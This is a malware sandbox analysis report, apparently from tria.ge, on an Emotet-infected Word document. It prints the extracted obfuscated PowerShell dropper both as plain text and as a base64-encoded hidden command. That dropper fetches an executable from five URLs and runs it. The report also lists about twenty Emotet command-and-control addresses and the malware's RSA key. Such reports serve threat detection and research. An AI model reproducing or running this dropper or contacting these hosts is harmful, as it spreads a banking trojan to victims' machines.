Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

task1

 

10

Analysis

  • max time kernel
    27s
  • resource
    win10v191014
  • submitted
    10/12/2019, 12:08 UTC

Sharing

Copy URL
Twitter E-mail

General

  • Target

    e4ea8d11c4961b44e32cdcb1cda5fa05b33137c1066761bc195194d9133f13a1.doc

  • Sample

    191210-csaawyhn5x

  • SHA256

    e4ea8d11c4961b44e32cdcb1cda5fa05b33137c1066761bc195194d9133f13a1

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
1
$Foboxugv='Jwgdbdovw';$Teyxaqtcm = '10';$Hofhcdaues='Kurudfxf';$Pisibadb=$env:userprofile+'\'+$Teyxaqtcm+'.exe';$Jirtznfh='Nugmipscu';$Rzjlthdjye=.('new-o'+'b'+'ject') Net.webClieNt;$Ngmoujtjvx='http://myphamthuydung.com/tmp/bwo/*http://lalletera.cat/bootstrap/ilym/*https://www.primepenguin.com/wp-admin/fefkbm/*https://www.ukrembtr.com/wp-admin/s3OYk/*https://shourayinfotech.xyz/wp-includes/pa1uxi/'."S`pLIT"('*');$Rggtgmts='Kkefwpie';foreach($Dqcphkgzdrohf in $Ngmoujtjvx){try{$Rzjlthdjye."dOwn`LOADFI`Le"($Dqcphkgzdrohf, $Pisibadb);$Xbjmpnelnnu='Csclasbl';If ((&('Get-'+'It'+'em') $Pisibadb)."LeN`GTH" -ge 31532) {[Diagnostics.Process]::"StA`Rt"($Pisibadb);$Dkchmzjyh='Pxtdthhe';break;$Zhcnueilm='Cejelwzndv'}}catch{}}$Zcfrxytdkvwd='Urvbnvft'
URLs
exe.dropper

http://myphamthuydung.com/tmp/bwo/
exe.dropper

http://lalletera.cat/bootstrap/ilym/
exe.dropper

https://www.primepenguin.com/wp-admin/fefkbm/
exe.dropper

https://www.ukrembtr.com/wp-admin/s3OYk/
exe.dropper

https://shourayinfotech.xyz/wp-includes/pa1uxi/

Extracted

Family

emotet

C2

2.38.99.79:80

98.24.231.64:80

47.156.70.145:80

37.59.24.177:8080

66.34.201.20:7080

108.179.206.219:8080

45.56.88.91:443

206.189.112.148:8080

120.150.246.241:80

190.56.255.118:80

200.71.148.138:8080

192.241.255.77:8080

211.63.71.72:8080

190.53.135.159:21

183.102.238.69:465

108.191.2.72:80

107.170.24.125:8080

167.114.242.226:8080

91.73.197.90:80

178.209.71.63:8080
rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKl4M80uy0jcxUiFIaJJyxgHVVnFtCq6
3
bi6f2xXPh/XUZNyN8UXDe5HzhTc4kwon9MBZffNwFOIc61QfV3K3YzEI/ktcyNqK
4
LS67ONxsVep769QdiVQJXrIaFjMXKz6viwIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e4ea8d11c4961b44e32cdcb1cda5fa05b33137c1066761bc195194d9133f13a1.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4812
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:1616
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABGAG8AYgBvAHgAdQBnAHYAPQAnAEoAdwBnAGQAYgBkAG8AdgB3ACcAOwAkAFQAZQB5AHgAYQBxAHQAYwBtACAAPQAgACcAMQAwACcAOwAkAEgAbwBmAGgAYwBkAGEAdQBlAHMAPQAnAEsAdQByAHUAZABmAHgAZgAnADsAJABQAGkAcwBpAGIAYQBkAGIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFQAZQB5AHgAYQBxAHQAYwBtACsAJwAuAGUAeABlACcAOwAkAEoAaQByAHQAegBuAGYAaAA9ACcATgB1AGcAbQBpAHAAcwBjAHUAJwA7ACQAUgB6AGoAbAB0AGgAZABqAHkAZQA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBlAHQALgB3AGUAYgBDAGwAaQBlAE4AdAA7ACQATgBnAG0AbwB1AGoAdABqAHYAeAA9ACcAaAB0AHQAcAA6AC8ALwBtAHkAcABoAGEAbQB0AGgAdQB5AGQAdQBuAGcALgBjAG8AbQAvAHQAbQBwAC8AYgB3AG8ALwAqAGgAdAB0AHAAOgAvAC8AbABhAGwAbABlAHQAZQByAGEALgBjAGEAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC8AaQBsAHkAbQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcAByAGkAbQBlAHAAZQBuAGcAdQBpAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAZQBmAGsAYgBtAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB1AGsAcgBlAG0AYgB0AHIALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHMAMwBPAFkAawAvACoAaAB0AHQAcABzADoALwAvAHMAaABvAHUAcgBhAHkAaQBuAGYAbwB0AGUAYwBoAC4AeAB5AHoALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBwAGEAMQB1AHgAaQAvACcALgAiAFMAYABwAEwASQBUACIAKAAnACoAJwApADsAJABSAGcAZwB0AGcAbQB0AHMAPQAnAEsAawBlAGYAdwBwAGkAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQARABxAGMAcABoAGsAZwB6AGQAcgBvAGgAZgAgAGkAbgAgACQATgBnAG0AbwB1AGoAdABqAHYAeAApAHsAdAByAHkAewAkAFIAegBqAGwAdABoAGQAagB5AGUALgAiAGQATwB3AG4AYABMAE8AQQBEAEYASQBgAEwAZQAiACgAJABEAHEAYwBwAGgAawBnAHoAZAByAG8AaABmACwAIAAkAFAAaQBzAGkAYgBhAGQAYgApADsAJABYAGIAagBtAHAAbgBlAGwAbgBuAHUAPQAnAEMAcwBjAGwAYQBzAGIAbAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAFAAaQBzAGkAYgBhAGQAYgApAC4AIgBMAGUATgBgAEcAVABIACIAIAAtAGcAZQAgADMAMQA1ADMAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAdAAiACgAJABQAGkAcwBpAGIAYQBkAGIAKQA7ACQARABrAGMAaABtAHoAagB5AGgAPQAnAFAAeAB0AGQAdABoAGgAZQAnADsAYgByAGUAYQBrADsAJABaAGgAYwBuAHUAZQBpAGwAbQA9ACcAQwBlAGoAZQBsAHcAegBuAGQAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABaAGMAZgByAHgAeQB0AGQAawB2AHcAZAA9ACcAVQByAHYAYgBuAHYAZgB0ACcA
      1⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:4400
      • C:\Users\Admin\10.exe
        "C:\Users\Admin\10.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:4476
        • C:\Users\Admin\10.exe
          --40d6fa9
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          • Suspicious use of SetWindowsHookEx
          PID:1628

    Network

    • 45.119.214.132:80
      myphamthuydung.com
    • 10.10.0.255:137
    • 10.10.0.10:137
    • 8.8.8.8:53
      myphamthuydung.com

      DNS Request

      myphamthuydung.com

      DNS Response

      45.119.214.132

    • 224.0.0.22

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1628-11-0x00000000020B0000-0x00000000020C7000-memory.dmp

      Filesize

      92KB

      Download

    • memory/1628-12-0x0000000000400000-0x000000000047C000-memory.dmp

      Filesize

      496KB

      Download

    • memory/4476-9-0x0000000002280000-0x0000000002297000-memory.dmp

      Filesize

      92KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.